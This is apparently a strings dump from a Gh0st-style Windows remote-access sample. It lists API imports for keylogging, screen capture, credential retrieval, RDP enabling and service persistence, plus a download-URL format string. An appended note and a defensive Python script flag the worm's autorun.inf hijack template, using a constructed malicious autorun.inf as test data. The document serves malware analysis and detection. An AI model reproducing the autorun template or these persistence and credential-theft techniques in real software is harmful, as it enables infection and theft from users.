?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z
eParam$
_errno
Error configure
es.dll
EventSystem
ExAllocatePoolWithTag
_except_handler3
ExecuUA
ExFreePoolWithTag
ExitProcess
ExitThread
ExitWindowsEx
ExpandEnvironmentStringsA
explorer.exe
Explorer.exe
EXPLORER.EXE
Expor.exe
FastUserSwitchingCompatibility
fclose
fDenyTSConnections
Fdf+Fh
FhURUPQ
file error
FindClose
FindFirstFileA
FindNextFileA
FindResourceA
FlushFileBuffers
FlushViewOfFile
freeaddrinfo
FreeConsole
FreeLibrary
FreeResource
FreeSid
;F<W<h<"=K=f=
fwrite
GDI32.dll
GD]_[Y
GetActiveWindow
getaddrinfo
GetClipboardData
GetCommandLineA
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetCursorInfo
GetCursorPos
GetDesktopWindow
GetDIBits
GetDiskFreeSpaceExA
GetDriveTypeA
GetExitCodeProcess
GetExitCodeThread
GetFileAttributesA
GetFileSize
GetFileTime
GetInputState
GetKeyNameTextA
GetLastError
GetLengthSid
GetLocalTime
GetLogicalDrives
GetLogicalDriveStringsA
__getmainargs
GetMessageA
GetModuleFileNameA
GetModuleFileNameExA
GetModuleHandleA
GetModuleInformation
GetPrivateProfileSectionNamesA
GetPrivateProfileStringA
GetProcAddress
GetProcessHeap
GetProcessWindowStation
GetStartupInfoA
GetSystemDirectoryA
GetSystemInfo
GetSystemMetrics
GetSystemTime
GetTempPathA
GetThreadDesktop
GetTickCount
GetTokenInformation
GetUrlCacheEntryInfoA
GetUserObjectInformationA
GetVersionExA
GetVolumeInformationA
GetWindowsDirectoryA
GetWindowTextA
GetWindowThreadProcessId
Gh0st Update
Ghost.exe
GlobalAlloc
GlobalFree
GlobalLock
GlobalMemoryStatusEx
GlobalSize
GlobalUnlock
Global\UUPP %d
?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z
>G?S?y?
=G>V>v>
<H1>403 Forbidden</H1>
h1l1.T
\hackeyes.dat
hackeyes.dll
HARDWARE\DESCRIPTION\System\CentralProcessor\0
H.data
:(;<;H;d;l;t;
HeapAlloc
HeapFree
helpsvc
Hotkey
|$HPWS
h.rdata
HtrHuk
http://
HTTP://
HTTP/1.0 200 OK
Http/1.1 403 Forbidden
HTTPS://
http://%s%s
http://%s/%s/%s.exe
ICClose
ICCompressorFree
ICOpen
ICSendMessage
ICSeqCompressFrame
ICSeqCompressFrameEnd
ICSeqCompressFrameStart
iD&YomH
?=?I?\?h?v?
IMM32.dll
ImmGetCompositionStringA
ImmGetContext
ImmReleaseContext
incompatible version
incomplete distance tree
incomplete dynamic bit lengths tree
incomplete literal/length tree
incorrect data check
incorrect header check
 inflate 1.1.4 Copyright 1995-2002 Mark Adler 
ingCompatibil
InitializeAcl
InitializeCriticalSection
InitializeSecurityDescriptor
_initterm
InstallModule
InstallShield Installation Information
insufficient memory
InterlockedExchange
Internet
InternetCloseHandle
Internet Explorer
InternetOpenA
InternetOpenUrlA
InternetReadFile
invalid bit length repeat
invalid block type
invalid distance code
invalid literal/length code
invalid stored block lengths
invalid window size
IoCreateDevice
IoCreateSymbolicLink
IocSymd
IoDeleteDevice
IoDeleteSymbolicLink
IofCompleteRequest
IsValidSid
IsWindow
IsWindowVisible
i|tlh`
Iu	_^[
>>>i>v>
_;i;z;
|$`j/W
;,<J<Y<d<j<s<
 -k 4/
_kaspersky
kca:\lsa
kernel32.dll
Kernel32.dll
KERNEL32.dll
KERNEL32.DLL
KeServiceDescriptorTable
KEveny
keybd_event
K:\Q.pdb`q
?+?>?l?
=>>L>[>
L$0Phx
L$4QRRRRRU
L$,91t
L$@_^][d
LeaveCriticalSection
L$$_^]f
L$@jdQV
L$$j\Q
L$L91t
L$LQVS
LoadCursorA
LoadLibraryA
LoadLibraryExA
LoadResource
LocalAlloc
LocalFree
LocalReAlloc
LocalSize
LockResource
LookupAccountNameA
LookupAccountSidA
LookupPrivilegeValueA
Loopt.bat
L$(PQj
L$,QWV
L$_RasDefaultCredentials#0
L$ RQPj
L$ RUPj
LsaClose
LsaFreeMemory
LsaOpenPolicy
LsaRetrievePrivateData
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrcpynA
lstrlenA
l$(VW3
m1\U\Kcn
malloc
MapViewOfFile
MapVirtualKeyA
m ,.CC
m ,.CCC
M:d:m:
MDM Serverice
memcpy
memmove
memset
Messenger
Microsoft Device Manager
microsoft frontpage
Microsoft\Network\Connections\pbk\rasphone.pbk
MmGetSystemRoutineAddress
MmMapLockedPagesSpecifyCache
?M?n?x?
mouse_event
MoveFileA
MoveFileExA
Movie Maker
Mozilla/4.0 (compatible)
MPR.dll
MSN Gaming Zone
mspmsnsv.dll
MSVCP60.dll
MSVCRT.dll
MSVFW32.dll
mswsock.dll
MultiByteToWideChar
|$$MZu'
NDSUPQ
need dictionary
NETAPI32.dll
NetLocalGroupAddMembers
Netman
netman.dll
NetMeeting
netsvcs
netsvcs_0x%d
NetUserAdd
?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB
NPRPUSj
 NT\Curr
ntdll.dll
\\.\NtHid
NtHid.sys
Ntmssvc
ntmssvc.dll
ntoskrnl.exe
NtQuerySystemInformation
ObfDereferenceObject
ObReferenceObjectByHandle
ObReferenceObjectByPointer
oft\Wud
OpenClipboard
OpenDesktopA
OpenEventA
OpenEventLogA
OpenInputDesktop
OpenProcess
OpenProcessToken
OpenSCManager()
OpenSCManagerA
OpenServiceA
OPEN=%s\%s
OpenThread
OpenWindowStationA
+OpsSCM
|otB.8
Outlook Express
oversubscribed distance tree
oversubscribed dynamic bit lengths tree
oversubscribed literal/length tree
>">/>p>
PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDd
Parameters
\Parameters
PathFileExistsA
pchsvc.dll
__p__commode
PeekNamedPipe
>P?e?k?
__p__fmode
PhoneNumber
Phvidc
\\.\pipe\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A
PortNumber
PostMessageA
PostThreadMessageA
PPPPPP
PPPPPP%SystemRoot%\system32\hackeyes.dll
Process32First
Process32Next
ProductName
Program Files\Internet Explorer\iexplore.exe
Program Files\WinRAR\Rar.exe
PSAPI.DLL
PsGetVersion
PsTerminateSystemThread
putchar
;<<P<x<
<'<=<P<Z<|<
P;Z;d;n;x;
;Q;];};
qmgr.dll
QQQQQQQ
QRPPPPPPVP
'q*#rrssC
QSSSSSSSSj
QueryServiceStatus
RasDialParams!%s#0
 `.rdat[
`.rdata
ReadFile
ReadProcessMemory
realloc
recycle.{645FF040-5081-101B-9F08-00AA002F954E}
RECYCLER
?_Refcnt@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEAAEPBD@Z
REG_BINARY
RegCloseKey
RegCreateKeyA
RegCreateKeyExA
RegDeleteKeyA
RegDeleteValueA
REG_DWORD
RegEnumKeyExA
RegEnumValueA
REG_EXPAND_SZ
RegisterServiceCtrlHandlerA
\Registry\Machine
REG_MULTI_SZ
RegOpenKeyA
RegOpenKeyExA
RegQueryValueA
RegQueryValueExA
RegQueryValueEx(Svchost\netsvcs)
RegQueryValueEx(Type)
RegSetValueExA
RegSetValueEx(start)
regsvc.dll
REG_SZ
ReleaseDC
ReleaseMutex
.reloc
@.reloc
Remote
RemoteRegistry
RemoveDirectoryA
ResetEvent
ResumeThread
<'=.=R=f=
-<RoA%'_h7
RPCRT4.dll
RtlInitUnicodeString
RtlIoU
%s\*.*
=;>S>}>
S1[1`1m1
%sautorun.inf
{schedsvc
schedsvc.dll
Schedule
<script 
%s%d%d%d%d%d%d
%s\desktop.txt
%s\dllcache\lsasvc.dll
SDPSRV
%s\drivers\etc\hosts
%s%d%s
Security
SeDebugPrivilege
SelectObject
SendMessageA
ServiceDll
ServiceMain
SeShutdownPrivilege
__set_app_type
SetCapture
SetClipboardData
SetCursorPos
SetEndOfFile
SetErrorMode
SetEvent
SetFileAttributesA
SetFilePointer
SetFileTime
SetLastError
SetNamedPipeHandleState
SetProcessWindowStation
SetRect
SetSecurityDescriptorDacl
SetServiceStatus
SetThreadDesktop
SetUnhandledExceptionFilter
__setusermatherr
SetWindowsHookExA
sfc_os.dll
sgegpjde11207255ADAAAAAA+/L8sbC0s6+zrrGws70FsLCxsb388QSpp6+ntZ8=
SHDeleteKeyA
shell32.dll
SHELL32.dll
ShellExecuteA
shell\explore=
shell\explore\Command=%s\%s %s
shell\open=
shell\open\Command=%s\%s %s
shell\open\Default=1
SHGetFileInfoA
SHGetSpecialFolderPathA
shlwapi.dll
SHLWAPI.dll
shsvcs.dll
ShutdownWithoutLogon
SizeofResource
%s M -ibck -r -o+ -ep1 "%s" "%s\*"
_snprintf
SOFTWARE\Mi
SOFTWARE\Microsoft\Windows\CurrentVersion\netcache
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
software\mICROSOFT\wINDOWS nt\cURRENTvERSION\sVCHOST
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SOFTWARE\Policies\Microsoft\Windows\Installer
\\%s\pipe
\\%s\pipe\browser
?_Split@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ
sprintf
=+=`=S>r>w>
%s%s*.*
=:=S=s=
%s\%s%d.exe
%s\%s.dll
SSDPSRV
ssdpsrv.dll
%s\SHELL\OPEN\COMMAND
%s\%s\%s
%s%s\%s
%s%s%s
StartServiceA
strchr
_strcmpi
stream end
stream error
strncat
strncmp
strncpy
_strnicmp
strrchr
strstr
\SUVWhP
SVWhDdk h$
SVWQRj
swsocknetman1ssdp
%s X -ibck "%s" "%s\"
System
\system32
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
SYSTEM\CurrentControlSet\Control\SafeBoot\Network
SYSTEM\CurrentControlSet\Control\Terminal Server
SYSTEM\CurrentControlSet\Control\Terminal Server\RDPTcp
SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp
SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
system\cURRENTcONTROLsET\sERVICES\
SYSTEM\CurrentControlSet\Services
system\cURRENTcONTROLsET\sERVICES\%s
SYSTEM\CurrentControlSet\Services\TermDD
SYSTEM\CurrentControlSet\Services\TermService
SYSTEM\Current%s\%s
SystemParametersInfoA
%SystemRoot%\system32\hackeyes.dll
%SystemRoot%\System32\svchost.exe -k netsvcs
System Volume Information
|$-[t.
T$0QRP
T+3x%A
Tapisrv
tapisrv.dll
T$DPVS
T$dQRP
TerminateProcess
TerminateThread
.textVT
T$ Fj:V
T$(Fj:V
Themes
_This #g
!This program cannot be run in DOS mode.
Thread32First
Thread32Next
?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z
tJ<\u8
|$<.tK
T$LPQR
T$LRWS
too many length or distance symbols
T$,PQhX@
T$(PQR
T$ QRj
tqSUVj2W
TransactNamedPipe
TranslateMessage
T$ RQPV
T$,RWV
TSEnabled
t-</t)F
tTisrv
t$ WSPVR
?%_#txg
tZ9H tU9H$tP
>"u:F@
UnhookWindowsHookEx
unknown compression method
UnmapViewOfFile
upnphost
upnphost.dll
#upnphostKn&s
URLDownloadToFileA
urlmon.dll
USER32.dll
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)
UuidFromStringA
UuidToStringA
\$ UVW
:@;v;{;
V3_3o3x3
V6sion\
VDPQRUSP
v|htcL
VirtualAlloc
VirtualAllocEx
VirtualFree
VirtualProtect
<;<V<i<u<
V@j QR
+*%*+vp*vCpuC
VVVVh0
VVVVVV
VVVVVVYUhbMC+Fnw==
?'?.?w?
|w9=trW
W(9W$u
WaitForMultipleObjects
WaitForSingleObject
waveInAddBuffer
waveInClose
waveInGetNumDevs
waveInOpen
waveInPrepareHeader
waveInReset
waveInStart
waveInStop
waveInUnprepareHeader
waveOutClose
waveOutGetNumDevs
waveOutOpen
waveOutPrepareHeader
waveOutReset
waveOutUnprepareHeader
waveOutWrite
wcscpy
wcstombs
WideCharToMultiByte
WindowFromPoint
WINDOWS
Windows Media Player
Windows NT
WindowsUpdate
WinExec
WININET.dll
Winlogon
WINMM.dll
WinRAR
winsta0
winsta0\default
WinSta0\Default
WINTRUST.dll
WinVerifyTrust
WithTag	
WmdmPmSN
WmdmPmSN'Fa
WNetAddConnection2A
WNetCloseEnum
WNetEnumResourceA
WNetOpenEnumA
WO$_9E
WriteFile
WriteProcessMemory
Ws2_32.dll
WS2_32.dll
WSAAddressToStringA
WSACreateEvent
WSAIoctl
WSARecvFrom
WSAResetEvent
WSASocketA
wsprintfA
WTSAPI32.dll
WTSFreeMemory
WTSQuerySessionInformationA
|$ WUSV
|$ WVU
WWRhP[
www.490a-B8B5-9B8C1E870B0C.com
www.baidu.com
WWWWWW
WWWWWWnw==
<	=x=}=
_XcptFilter
<)<.<X<i<o
<)<.<X<i<o<
xmlpbS
xmlprov
xmlprov.dll
{+xN{tEODBE
XPTPSW
XPVSSG
?_Xran@std@@YAXXZ
XRichS
xwuLEwE
/;%y;~;
.y!GN&
*y/.uzyzuEFzG
@z}]u2o
ZwClose
ZwCreateKey
ZwOpenKey
ZwQueryInformationThread
ZwSetValueKey
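
The strings [autorun], OPEN=%s\%s, shell\open\Command=%s\%s %s, shell\open\Default=1, shell\explore\Command=%s\%s %s, %sautorun.inf, RECYCLER and recycle.{645FF040-5081-101B-9F08-00AA002F954E} are the template for removable-drive propagation used by the Viking/Fujacks family that most of the AV names above point to: a dropper is copied into a hidden directory on the drive root and autorun.inf is rewritten so that both the open and explore verbs launch it. The Python below, added here and not part of the report, parses an autorun.inf and flags that template; both autorun.inf texts are constructed, and Ghost.exe together with the -run argument are placeholders for the %s fields the sample fills in at runtime.

```python
"""Assess an autorun.inf for the removable-media hijack template.

Added example; not code from the report.  Both autorun.inf texts are
constructed; 'Ghost.exe' and '-run' are placeholders for the %s fields.
"""
import re

# Drive-root directories the sample's strings use as drop locations.
SUSPICIOUS_DIRS = {
    "recycler",
    "recycle.{645ff040-5081-101b-9f08-00aa002f954e}",
    "system volume information",
}
EXEC_EXT = {".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs"}
LAUNCH_KEYS = ("open", "shellexecute", "shell\\open\\command", "shell\\explore\\command")


def parse_autorun(text):
    """Minimal INI parser: {section: {key: value}}, keys lower-cased, last wins."""
    out, section = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            out.setdefault(section, {})
        elif "=" in line and section is not None:
            key, value = line.split("=", 1)
            out[section][key.strip().lower()] = value.strip()
    return out


def first_token(command):
    """Executable part of a command line, honouring double quotes."""
    m = re.match(r'\s*(?:"([^"]*)"|(\S+))', command)
    return (m.group(1) or m.group(2) or "") if m else ""


def assess_autorun(text):
    """Return human-readable reasons an autorun.inf matches the worm template."""
    auto = parse_autorun(text).get("autorun", {})
    reasons = []
    for key in LAUNCH_KEYS:
        target = first_token(auto.get(key, ""))
        if not target:
            continue
        low = target.lower().replace("/", "\\")
        ext = "." + low.rsplit(".", 1)[-1] if "." in low else ""
        if ext in EXEC_EXT:
            reasons.append("%s launches executable %s" % (key, target))
        top = low.split("\\", 1)[0]
        if top in SUSPICIOUS_DIRS:
            reasons.append("%s points into %s" % (key, top))
    if auto.get("shell\\open\\default") == "1":
        reasons.append("shell\\open\\Default=1 present (matches the template in this sample's strings)")
    return reasons


# Constructed from the format strings in the report; basename and argument are placeholders.
MALICIOUS_AUTORUN = r"""[autorun]
OPEN=RECYCLER\Ghost.exe
shell\open=
shell\open\Command=RECYCLER\Ghost.exe -run
shell\open\Default=1
shell\explore=
shell\explore\Command=RECYCLER\Ghost.exe -run
"""
# Constructed benign file of the kind a vendor driver CD ships.
BENIGN_AUTORUN = r"""[autorun]
icon=setup.ico
label=Vendor Driver CD
"""

if __name__ == "__main__":
    for name, text in (("malicious", MALICIOUS_AUTORUN), ("benign", BENIGN_AUTORUN)):
        print(name, "->", assess_autorun(text) or "no findings")
```

A vendor CD with open=setup.exe trips the executable check alone, so weight the drop-directory and shell\open\Default=1 matches higher than a bare launch of an executable when triaging at scale; the combination of all three is what this family's template produces.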